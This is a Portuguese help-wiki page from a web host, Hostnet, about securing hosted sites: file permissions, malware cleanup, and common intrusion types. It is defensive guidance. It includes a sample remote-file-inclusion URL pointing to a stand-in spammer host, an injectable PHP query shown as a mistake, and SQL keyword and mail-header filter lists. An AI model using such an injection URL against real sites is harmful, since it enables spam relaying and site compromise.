Segurança

De Wiki Hostnet
Ir para: navegação, pesquisa

A Hostnet adota todos os cuidados e precauções para que seus sistemas e servidores estejam sempre atualizados e reparados, a fim de evitar quaisquer brechas de segurança nos sites hospedados em nosso ambiente compartilhado.

Entretanto, às vezes podem surgir vulnerabilidades que são alheias aos nossos servidores e podem ser exploradas por diversos meios. Alguns exemplos são:

  • Falhas na programação dos sites e sistemas hospedados.
  • Scripts inseridos fazendo uso de falhas como PHP e SQL Injection.
  • Arquivos maliciosos instalados no computador que realiza as manipulações do site.
  • Entre outros.

Devido a isto, indicamos algumas prevenções simples.


Principais recomendações de segurança:

  • Altere periodicamente a sua senha de acesso ao serviço FTP;
  • Caso não utilize FTP, recomendamos que faça o bloqueio de acesso ao mesmo, use a opção em seu Painel Conta >> Alterar Senhas, onde poderá fazer o bloqueio de acesso ao FTP do seu domínio;
  • Evite usar senhas fáceis, como datas de nascimento ou sequências conhecidas. Alguns exemplos de senhas fracas e ruins são: 123456, qwerty, 123123, entre outros;
  • Mantenha seu sistema sempre atualizado. É comum que nas novas versões dos softwares usados, as falhas de segurança sejam corrigidas, assim como falhas de versões anteriores;
  • No sistema, tenha cuidado com a parte que permite que seja feito o upload para ele. A maioria das invasões ocorre por falhas de segurança nos sistemas, e o invasor consegue injetar código malicioso;
  • Procure restringir na parte de upload de arquivos, os formatos que poderão ser enviados. Por exemplo, permita apenas o upload de arquivos com extensões JPG e PNG;
  • Tenha um antivírus ativado em seu computador pessoal;
  • Instale um firewall em seu computador pessoal. Dessa forma, você irá evitar que uma falha de segurança do seu computador seja explorada, ou que um programa malicioso no seu computador se propague, contaminando outros;
  • Evite usar permissões do tipo 777 (leitura, gravação e execução para o proprietário, grupo ao qual ele pertence e todos os outros) em seus arquivos e pastas. Esta permissão deve ser evitada ao máximo, use-a nas pastas onde isso é realmente necessário;

Padrão de permissão em pastas e arquivos:

  • Arquivos com permissão 644, que significa:
  1. Permissão de leitura e gravação para o proprietário do arquivo.
  2. Permissão de leitura para o grupo ao qual o proprietário do arquivo faz parte.
  3. Permissão de leitura para todos os outros usuários.
  • Pastas com permissão 755, que significa:
  1. Permissão de leitura, gravação e execução para o proprietário da pasta.
  2. Permissão de leitura e execução para o grupo ao qual o proprietário da pasta faz parte.
  3. Permissão de leitura e execução para todos os outros usuários.


Os comandos abaixo executados por SSH corrigem as permissões:
Para colocar permissão 644 em todos os arquivos, use: find . -type f -exec chmod 644 '{}' \;
Para colocar permissão 755 em todos as pastas, use: find . -type d -exec chmod 755 '{}' \;


Minha hospedagem está infectada com arquivos maliciosos, o que devo fazer?

As primeiras medidas a serem aplicadas na sua hospedagem na Hostnet são:

  • Verifique se o antivírus, firewall e anti-spyware que você tem instalados no seu computador local são confiáveis e se estão atualizados.
  • Atualize suas ferramentas de segurança, e faça o download de todos os arquivos do site para este computador.
  • Execute uma passagem do antivírus em todos os arquivos do site. Caso seja identificado algum vírus, remova-o.
  • Após certificar-se de que todos os arquivos do site estão livres de arquivos maliciosos, faça o upload dos mesmos para o servidor FTP do seu domínio.
  • Caso persista a ameaça, verifique com seu webmaster se no arquivo índice do seu site (index.html, index.php, etc) há algum iframe que executa o vírus a partir de outro local, pois esta será a razão do incidente.
  • Após todos estes passos, abra um chamado em nosso HelpDesk solicitando uma varredura no servidor com nosso antivírus (ClamAV) para uma verificação final do caso.

Lembramos que a integridade dos arquivos e programas descarregados ou enviados pelo seu site, bem como os danos que estes podem causar a terceiros, é de responsabilidade do proprietário do site. Sendo assim, a Hostnet está isenta de qualquer problema decorrente da contaminação causada por estes arquivos/programas.


Site identificado como perigoso pelo Google, o que devo fazer?

Siga os mesmos procedimentos do tópico acima e depois os passos abaixo:

  • Cadastre seu site na ferramenta de webmasters que é disponibilizada pelo Google.
  • Faça os procedimentos que o Google solicita. Desta forma, eles apontarão quais são os arquivos considerados "maliciosos" dentro do seu site.
  • Verifique os arquivos mencionados e faça a limpeza, usando um cliente FTP.
  • Em seguida, solicite uma reconsideração do seu site através do próprio Google Webmaster.

Qual o antivírus usado nos servidor da Hostnet?

Para o serviço de e-mail utilizamos o Amavis, já para os servidores Web, trabalhamos com o Clamav.

Tipos de invasão:

SQL Injection:

SQL Injection é um ataque que consiste na inserção (conhecido como injeção) de uma query via aplicação web.
No "SQL Injection", o invasor consegue através de brechas no site executar queries ou statements arbitrários numa base relacional via "injeção" de comandos em campos de formulários.


Para se proteger de ocorrências de SQL Injection, verifique se todo parâmetro passado para o seu site é tratado antes que seja concatenado na query.

Por exemplo, é muito comum erros como os que estão aí embaixo serem cometidos:

// PHP
$consulta = "DELETE FROM tabela WHERE id_tabela = " . $_POST[id];

Evite cometê-los. Em vez disso, trate primeiro o Request.Form("id") ou $_POST[id], como neste exemplo:

//PHP
if (is_numeric($_POST[id])) {
    $consulta = "DELETE FROM tabela WHERE id_tabela = " . $_POST[id];
} else {
   die("Dados inválidos");
}


Com a linguagem PHP, no lugar de simplesmente validar $id, valide:

$_GET[id]  -> se o "id" tiver que ser passado via GET
$_POST[id] -> se o "id" tiver que ser passado via POST

Para campos com strings, é aconselhável checar pelos caracteres:

  "  (aspas duplas)
  '  (aspas simples)
     (espaços)
  ;  (ponto e vírgula)
  =  (sinal de igual)
  <  (sinal de menor que)
  >  (sinal de maior que)
  !  (ponto de exclamação)
  -- (dois hifens, indica início de comentário em alguns bancos)
  #  (sustenido ou jogo-da-velha, indica início de comentário em alguns bancos)
  // (duas barras, indica início de comentário em alguns bancos)

Ou pelas palavras reservadas

 - SELECT       - INSERT
 - UPDATE       - DELETE
 - WHERE        - JOIN
 - LEFT         - INNER
 - NOT          - IN
 - LIKE         - TRUNCATE
 - DROP         - CREATE
 - ALTER        - DELIMITER

OBS: O trecho de código mencionado acima é apenas uma sugestão. Portanto, é aconselhável um tratamento mais incrementado para abordar todas as possíveis proteções.
Dicas úteis podem ser encontradas facilmente pela Internet ou podem ser obtidas com o seu desenvolvedor.


Script Injection

Explorando scripts que permitem a inserção de parâmetros na URL, o invasor pode, por exemplo, executar um script externo para envio de spam usando seu website. Neste caso, a URL ficaria com um formato similar a:

http://www.sitevulnerável.com.br/index.php?page=

http://sitedospammer.ru:q1w2e3r4@ftp.repositóriodearquivos.ru/lista.TXT

Nossa sugestão, neste caso, é que os scripts afetados filtrem a ocorrência de padrões como: "http://" nos parâmetros da URL, impedindo a chamada de scripts externos.


Mail Form Injection

A partir de formulários de contato do site, o invasor insere comandos SMTP nos campos (ou variáveis) que permitem enviar mensagens de spam.

Nossa sugestão, neste caso, é que os scripts afetados filtrem a ocorrência de padrões como: "CC:", "Cc:", "cc:", "BCC:", "Bcc:" e "bcc:", impedindo seu uso para envio de spams.


Upload de Códigos Maliciosos

Esse é o tipo mais comum de invasão hoje em dia.

Usando formulários de upload sem autenticação de acesso, ou a partir de uma invasão de áreas vulneráveis do site, o spammer faz o upload de scripts maliciosos para alteração de arquivos, alteração do banco de dados ou envio de spam.

Nossa sugestão, neste caso, é manter o acesso a áreas de upload de arquivos protegido por senha. Além disso, é necessário manter softwares de terceiros, como lojas on-line e CMS, sempre atualizados e com vulnerabilidades corrigidas.


Invasão via FTP

Nesta situação, a senha é obtida por terceiros a partir de programas maliciosos instalados no computador do usuário. Estes programas, captam e enviam os dados de acesso ao FTP para terceiros que, posteriormente, os utilizam para publicação de scripts para envio de spam, propagação de vírus ou hospedagem de sites falsos.

Nossa sugestão, neste caso, é manter um bom software antivírus instalado e atualizado nos computadores que acessam o site via FTP. Além disso, evite acessar o site via FTP em computadores de uso comum, como os disponíveis em lanhouses e cybercafés.


Sistema de notificação sobre incidentes de segurança em nossos servidores

A Hostnet avisa quando detecta algo irregular no site?

Sim. Nosso departamento de Infraestrutura faz uma notificação ao cliente através do HelpDesk, informando os arquivos que foram identificados como maliciosos e solicitando seu retorno para identificarmos a natureza do arquivo encontrado. Esse retorno é aguardado por até 24 horas e, quando não ocorre, buscamos contato telefônico.


O site que contém arquivos maliciosos pode ser congelado?

A nossa ação visa resolver o incidente e evitar danos aos visitantes do site ou mesmo instabilidades no servidor. Logo, em primeiro lugar, removemos os arquivos infectados e em seguida notificamos o responsável pelo site. Em casos de reincidência ou falta de resposta ao nosso contato por mais de 48 horas, a conta é congelada e o cliente é notificado via HelpDesk.


Qual a posição da Hostnet diante desses incidentes?

Não existe interesse por parte da Hostnet em retirar do ar os sites hospedados conosco, muito pelo contrário. Por isso, oferecemos ajuda e orientações para que o seu site obtenha as correções de segurança necessárias e o problema seja solucionado. Dessa forma, evita-se que os problemas adquiram proporções maiores, como a punição do site no Google ou o bloqueio dos endereços IP da Hostnet.

Um único site infectado, se não tratado imediatamente, pode acarretar o bloqueio de toda a nossa faixa de endereços IP e prejudicar todos os domínios hospedados sob estes endereços.

Por exemplo, imagine se serviços de banda larga como o Velox (Oi), o Speedy (Vivo) ou o Virtua (Net) bloqueiam o acesso à nossa faixa de endereços IP. Clientes que usam uma destas conexões ficariam totalmente sem acesso aos nossos serviços; os visitantes não conseguiriam abrir os sites para navegar; os proprietários e seus webmasters não conseguiriam conectar via FTP para atualizar e corrigir os problemas. Ou seja, seria um grande impacto.

Além disso, algo que pode acontecer é o site ser identificado como contaminado com vírus pelos buscadores, e sofrer punições, como o acesso tornar-se restrito.. Isso prejudica a imagem do site e seu posicionamento nas buscas.

Hackers também usam diversos artifícios para manipular sites de terceiros e usá-los para aplicar golpes em bancos, e uma infinidade de outras naturezas mal intencionadas que não condizem com o interesse do dono do site.

É por esta razão que a identificação de arquivos maliciosos requer uma ação imediata por parte da Hostnet, que zela pela integridade dos servidores, pela orientação ao proprietário do site e pelos usuários que navegam nos sites aqui hospedados.


Veja também:


Links úteis: